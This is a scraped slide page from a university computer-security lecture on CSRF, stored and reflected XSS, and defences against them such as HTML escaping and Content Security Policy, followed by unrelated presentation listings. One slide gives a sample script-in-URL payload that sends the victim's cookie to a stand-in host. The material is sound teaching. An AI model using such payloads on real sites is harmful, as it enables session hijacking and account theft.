web security xss misleading users
play

Web Security: XSS, Misleading Users CS 161: Computer Security Prof. - PowerPoint PPT Presentation

Sep 07, 2022 •310 likes •1.07k views

Web Security: XSS, Misleading Users CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva Dornadula, David Fifield, Mia Gil Epner, David Hahn, Warren He, Grant Ho, Frank Li, Nathan Malkin, Mitar Milutinovic, Rishabh Poddar,

  1. Web Security: XSS, Misleading Users CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva Dornadula, David Fifield, Mia Gil Epner, David Hahn, Warren He, Grant Ho, Frank Li, Nathan Malkin, Mitar Milutinovic, Rishabh Poddar, Rebecca Portnoff, Nate Wang http://inst.eecs.berkeley.edu/~cs161 / February 9, 2017 Some content adapted from materials by Dan Boneh and John Mitchell

  2. CSRF Scenario Server Victim my bank.com n o i s s e s h s i l b a t s e 1 send forged request (w/ cookie) 4 5 Bank acts on request, 2 since it has valid visit server malicious page 3 cookie for user User Victim containing URL to my bank.com with bad Attack Server attacker.com cookie for actions my bank.com

  3. CSRF: Summary • Target: user who has some sort of account on a vulnerable server where requests from the user’s browser to the server have a predictable structure • Attacker goal: make requests to the server via the user’s browser that look to server like user intended to make them • Attacker tools: ability to get user to visit a web page under the attacker’s control • Key tricks: (1) requests to web server have predictable structure ; (2) use of <IMG SRC=…> or such to force victim’s browser to issue such a (predictable) request • Notes: (1) do not confuse with Cross-Site Scripting (XSS); (2) attack only requires HTML, no need for Javascript

  4. Stored XSS (Cross-Site Scripting) Attack Browser/Server a t a d e l b a u a l v l a e t s 6 evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script 5 perform attacker action Server Patsy/Victim 4 includes authenticator cookie execute script (A “ stored ” embedded in input XSS attack) as though server meant us to run it mybank.com

  5. Stored XSS: Summary • Target: user with Javascript-enabled browser who visits user-generated-content page on vulnerable web service • Attacker goal: run script in user’s browser with same access as provided to server’s regular scripts (subvert SOP = Same Origin Policy ) • Attacker tools: ability to leave content on web server page (e.g., via an ordinary browser); optionally, a server used to receive stolen information such as cookies • Key trick: server fails to ensure that content uploaded to page does not contain embedded scripts • Notes: (1) do not confuse with Cross-Site Request Forgery (CSRF); (2) requires use of Javascript ( generally )

  6. Two Types of XSS (Cross-Site Scripting) • There are two main types of XSS attacks • In a stored (or “ persistent ” ) XSS attack, the attacker leaves their script lying around on mybank.com server – … and the server later unwittingly sends it to your browser – Your browser is none the wiser, and executes it within the same origin as the mybank.com server • In a reflected XSS attack, the attacker gets you to send the mybank.com server a URL that has a Javascript script crammed into it … – … and the server echoes it back to you in its response – Your browser is none the wiser, and executes the script in the response within the same origin as mybank.com

  7. Reflected XSS (Cross-Site Scripting) Victim client

  8. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 evil.com Victim client

  9. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com Victim client

  10. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com Exact URL under attacker ’ s control 3 click on link Victim client Server Patsy/Victim mybank.com

  11. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com 3 click on link Victim client 4 echo user input Server Patsy/Victim mybank.com

  12. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it mybank.com

  13. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it mybank.com

  14. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v And/Or: 1 receive malicious page a t 2 a d e l b evil.com a u l a v d n e s 7 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it mybank.com

  15. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page a t 2 a d e l b evil.com a u l a v d n e s 7 ( “ Reflected ” XSS attack) 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it mybank.com

  16. Example of How Reflected XSS Can Come About • User input is echoed into HTML response. • Example : search field – http://victim.com/search.php?term= apple – search.php responds with <HTML> <TITLE> Search Results </TITLE> <BODY> Results for $term : . . . </BODY> </HTML> How does an attacker who gets you to visit evil.com exploit this?

  17. Injection Via Script-in-URL • Consider this link on evil.com: (properly URL encoded) http://victim.com/search.php?term= <script> window.open( "http://badguy.com?cookie = " + document.cookie ) </script> What if user clicks on this link? 1) Browser goes to victim.com/search.php ? ... 2) victim.com returns <HTML> Results for <script> … </script> … 3) Browser executes script in same origin as victim.com Sends badguy.com cookie for victim.com

  18. Surely is not vulnerable to Reflected XSS, right?

  19. Reflected XSS: Summary • Target: user with Javascript-enabled browser who visits a vulnerable web service that will include parts of URLs it receives in the web page output it generates • Attacker goal: run script in user’s browser with same access as provided to server’s regular scripts (subvert SOP = Same Origin Policy ) • Attacker tools: ability to get user to click on a specially- crafted URL; optionally, a server used to receive stolen information such as cookies • Key trick: server fails to ensure that output it generates does not contain embedded scripts other than its own • Notes: (1) do not confuse with Cross-Site Request Forgery (CSRF); (2) requires use of Javascript ( generally )

  20. Defending Against XSS

  21. Protecting Servers Against XSS (OWASP) • OWASP = Open Web Application Security Project • Lots of guidelines, but 3 key ones cover most situations https://www.owasp.org/index.php/ XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet 1. Never insert untrusted data except in allowed locations 2. HTML-escape before inserting untrusted data into simple HTML element contents 3. HTML-escape all non-alphanumeric characters before inserting untrusted data into simple attribute contents

  22. Never Insert Untrusted Data Except In Allowed Locations

  23. HTML-Escape Before Inserting Untrusted Data into Simple HTML Element Contents “Simple”: <p>, <b>, <td> , … Rewrite 6 characters (or, better, use framework functionality ):

  24. HTML-Escape Before Inserting Untrusted Data into Simple HTML Element Contents Rewrite 6 characters (or, better, use framework functionality ): While this is a “default-allow” black-list , it’s one that’s been heavily community-vetted

  25. HTML-Escape All Non-Alphanumeric Characters Before Inserting Untrusted Data into Simple Attribute Contents “Simple”: width=, height=, value= … NOT : href=, style=, src=, on XXX = ... Escape using &#x HH ; where HH is hex ASCII code (or better, again, use framework support)

  26. Content Security Policy (CSP) • Goal: prevent XSS by specifying a white-list from where a browser can load resources (Javascript scripts, images, frames, … ) for a given web page • Approach: – Prohibits inline scripts – Content-Security-Policy HTTP header allows reply to specify white-list, instructs the browser to only execute or render resources from those sources • E.g., script-src 'self' http://b.com; img-src * – Relies on browser to enforce http://www.html5rocks.com/en/tutorials/security/content-security-policy/

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser assumes that clicks and keystrokes = clear indication of what the user wants to do Constitutes part of the users trusted path Attacker can

619 views • 38 slides
SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Security Management Security in RiskView The Security functionality allows Users with Admin Group

Security Management Security in RiskView The Security functionality allows Users with Admin Group

Security Management Security in RiskView The Security functionality allows Users with Admin Group Permissions to: Setup and maintain the Users that can access the system Setup and maintain the Registers that separate the risk data into

336 views • 14 slides
Introduction to DB Security Secrecy: Users should not be able to see things they are not

Introduction to DB Security Secrecy: Users should not be able to see things they are not

Introduction to DB Security Secrecy: Users should not be able to see things they are not supposed to. Security E.g., A student cant see other students grades. Integrity: Users should not be able to modify things they are not

424 views • 3 slides
CS 4803 Computer and Network Security Servers Users How do users prove their identities when

CS 4803 Computer and Network Security Servers Users How do users prove their identities when

Many-to-Many Authentication ? CS 4803 Computer and Network Security Servers Users How do users prove their identities when requesting services from machines on the network? Alexandra (Sasha) Boldyreva Nave solution: every server knows

217 views • 5 slides
Security and Authorization [R&amp;G] Chapter 21 CS432 1 Introduction to DB Security

Security and Authorization [R&amp;G] Chapter 21 CS432 1 Introduction to DB Security

Security and Authorization [R&amp;G] Chapter 21 CS432 1 Introduction to DB Security Secrecy: Users should not be able to see things they are not supposed to. E.g., A student cant see other students grades. Integrity: Users

522 views • 8 slides
Experiences on how to p contact with end-users (policies and ISO security (policies and ISO

Experiences on how to p contact with end-users (policies and ISO security (policies and ISO

Experiences on how to p contact with end-users (policies and ISO security (policies and ISO security standards at campuses) p ) Brian OHora, BSc (Hons) &amp; MBA Technology Management Information Systems Services, TCD TERENA E2E

325 views • 15 slides
Database Security Enforced Database security - only authorized users can perform authorized

Database Security Enforced Database security - only authorized users can perform authorized

IT360: Applied Database Systems Database Security Kroenke: Ch 9, pg 309-314 PHP and MySQL: Ch 9, pg 217-227 1 Rights Database Security Enforced Database security - only authorized users can perform authorized activities Responsibilities

317 views • 9 slides
Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson

Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson

Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson Carnegie Mellon University Why a security feature is like a startup &lt;10 users ~1 million users &gt;1 billion users Ideas trying to cross the chasm

825 views • 46 slides
Cyber Security WCA - 2019 1 BILLION users Lets level set with some Defjnitions and

Cyber Security WCA - 2019 1 BILLION users Lets level set with some Defjnitions and

App Engine A Practical Approach To Cyber Security WCA - 2019 1 BILLION users Lets level set with some Defjnitions and Examples Protecting digital data and assets (a subset of information security) Confidentiality 1 Integrity 2

421 views • 21 slides
What is the SDF? Many of the top security researchers volunteer their time Research users

What is the SDF? Many of the top security researchers volunteer their time Research users

What is the SDF? Many of the top security researchers volunteer their time Research users include Facebook, Google, MS, Trend, Kaspersky, etc.. Update from ICANN .CR: Changed Paths Backend Data, DB, and API stable and actively

363 views • 9 slides
Io IoT T Security In Informatio ion sec securit ity Confidentiality Data accessed

Io IoT T Security In Informatio ion sec securit ity Confidentiality Data accessed

Security &amp; Knowledge Management a.a. 2019/20 Io IoT T Security In Informatio ion sec securit ity Confidentiality Data accessed just by permitted users Integrity Not tampered by not permitted users Availability

558 views • 21 slides
PROTECTING DIGITAL INFORMATION Roadmap: Fall 2018 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2018 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2018 But First, An Aside: This is Misleading This is More Like It Inside the Computer: Gates AND Gate 0 0 Input Wires 1 Output Wire 0's &amp; 1's represent low &amp; high voltage,

616 views • 59 slides
PROTECTING DIGITAL INFORMATION Roadmap: Fall 2017 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2017 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2017 But First, An Aside: This is Misleading This is More Like It Inside the Computer: Gates AND Gate 0 0 Input Wires 1 Output Wire 0's &amp; 1's represent low &amp; high voltage,

1.13k views • 59 slides
Chapter 9 Cloud Security Contents Security in an interconnected world, cloud security

Chapter 9 Cloud Security Contents Security in an interconnected world, cloud security

Chapter 9 Cloud Security Contents Security in an interconnected world, cloud security risks. Attacks in a cloud environment, top threats. Security, a major concern for cloud users. Privacy. Trust. Operating systems

661 views • 38 slides
Grid School Module 4: Grid Security 1 Typical Grid Scenario Resources Users 2 Requirements

Grid School Module 4: Grid Security 1 Typical Grid Scenario Resources Users 2 Requirements

Grid School Module 4: Grid Security 1 Typical Grid Scenario Resources Users 2 Requirements The users want to be able to communicate securely Three fundamental concepts (more on the following slides): Privacy - only invited to understand

484 views • 35 slides
FOSDEM 2020 Bruxelles IPv6 LLU Endpoint Support in DNS .. and its implementation in djbdnscurve6

FOSDEM 2020 Bruxelles IPv6 LLU Endpoint Support in DNS .. and its implementation in djbdnscurve6

Scope &amp; Objectives Scoped IPv6 Address Support Qualifying the DNS (stub) Resolver Case Studies &amp; Outlook Backup Slides Literature FOSDEM 2020 Bruxelles IPv6 LLU Endpoint Support in DNS .. and its implementation in djbdnscurve6

314 views • 20 slides
Computer Science Instructor: Qingsong Guo School of Computer Science &amp; Technology

Computer Science Instructor: Qingsong Guo School of Computer Science &amp; Technology

CS101 Fall 2017 Introduction to Computer Science Instructor: Qingsong Guo School of Computer Science &amp; Technology http://abelgo.cn/cs101.html Lecture 2, Lecture 3: Welcome to the Digital World ! Think in Data: Data Storage Bits, Data

873 views • 76 slides
Fall Prevention No disclosures School of Medicine and Management Division of Geriatrics

Fall Prevention No disclosures School of Medicine and Management Division of Geriatrics

Presenter Disclosure Information Louise Aronson Fall Prevention No disclosures School of Medicine and Management Division of Geriatrics Osteoporosis CME 2013 Louise Aronson MD MFA Associate Professor UCSF Division of Geriatrics

377 views • 13 slides
Drought Prof. R. Nagarajan, CSRE , IIT Bombay 9.01 GNR 639 GNR 639 : Natural Disaster And

Drought Prof. R. Nagarajan, CSRE , IIT Bombay 9.01 GNR 639 GNR 639 : Natural Disaster And

GNR 639 GNR 639 : Natural Disaster And Management Lesson 9 Drought Prof. R. Nagarajan, CSRE , IIT Bombay 9.01 GNR 639 GNR 639 : Natural Disaster And Management Water stress occurs when the demand for water exceeds the available amount

1.13k views • 62 slides
2015-2017 (c) P.Pale: Computer Forensics 2015-10-17 File System Forensics A New York

2015-2017 (c) P.Pale: Computer Forensics 2015-10-17 File System Forensics A New York

2015-2017 (c) P.Pale: Computer Forensics 2015-10-17 File System Forensics A New York computer forensics firm found that 40% of the hard disk drives it recently purchased in bulk orders on eBay contained personal, private and sensitive

884 views • 70 slides
Natural Selection 02-715 Advanced Topics in Computa8onal Genomics

Natural Selection 02-715 Advanced Topics in Computa8onal Genomics

Natural Selection 02-715 Advanced Topics in Computa8onal Genomics Natural Selection Compara8ve studies across species O=en focus on protein-coding regions Genes

450 views • 30 slides
Growth Of MgB 2 Films On Cu For SRF Cavities Wenura Withanage Advisor Prof. Xiaoxing Xi 1

Growth Of MgB 2 Films On Cu For SRF Cavities Wenura Withanage Advisor Prof. Xiaoxing Xi 1

Growth Of MgB 2 Films On Cu For SRF Cavities Wenura Withanage Advisor Prof. Xiaoxing Xi 1 Outline Superconducting MgB 2 Motivation &amp; Goal Hybrid physical chemical vapor deposition (HPCVD) of MgB 2 at Temple University MgB

509 views • 22 slides
benchmarking webinar benchmarking webinar Roger Sylvester-Bradley, Sajjad Awan and Teresa Meadows

benchmarking webinar benchmarking webinar Roger Sylvester-Bradley, Sajjad Awan and Teresa Meadows

Grain nutrient Grain nutrient ana analys lysis is and and benchmarking webinar benchmarking webinar Roger Sylvester-Bradley, Sajjad Awan and Teresa Meadows Housekeeping Nutrient Management @rogersylbrad Guide @CerealsEA @AHDB_Cereals

474 views • 28 slides

More recommend